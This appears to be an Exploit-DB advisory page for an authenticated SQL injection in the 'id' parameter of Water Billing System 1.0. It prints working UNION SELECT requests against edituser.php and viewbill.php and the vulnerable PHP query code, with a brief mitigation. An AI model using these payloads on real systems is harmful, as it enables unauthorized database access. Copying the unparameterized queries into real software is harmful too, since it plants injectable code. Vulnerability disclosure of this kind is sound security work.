header-logo
Suggest Exploit
vendor:
Water Billing System
by:
Mehmet Kelepçe / Gais Cyber Security
N/A
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Water Billing System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Apache2 and Windows 10
2020

Water Billing System 1.0 – ‘id’ SQL Injection (Authenticated)

The 'id' parameter in the 'edituser.php' and 'viewbill.php' pages of the Water Billing System 1.0 is vulnerable to SQL Injection. An attacker can manipulate the 'id' parameter to execute arbitrary SQL queries.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to ensure that user-supplied input is properly sanitized and does not interfere with the structure of the SQL query.
Source

Exploit-DB raw data:

# Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 2020-11-14
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: Apache2 and Windows 10

Vulnerable param: id
-------------------------------------------------------------------------
GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/WBS/user.php
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean




-------------------------------------------------------------------------

Source Code: edituser.php

..
..
..
$user_id =$_REQUEST['id'];
$result = mysqli_query($conn,"SELECT * FROM user WHERE id  = '$user_id'");
..
..

-------------------------------

Vulnerable param: id
-------------------------------------------------------------------------
GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://localhost
Connection: close
Cookie: COOKIE
Upgrade-Insecure-Requests: 1
-------------------------------------------------------------------------

Source Code: \WBS\viewbill.php

..
..
..
$id =$_REQUEST['id'];
$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
..
..

-------------------------------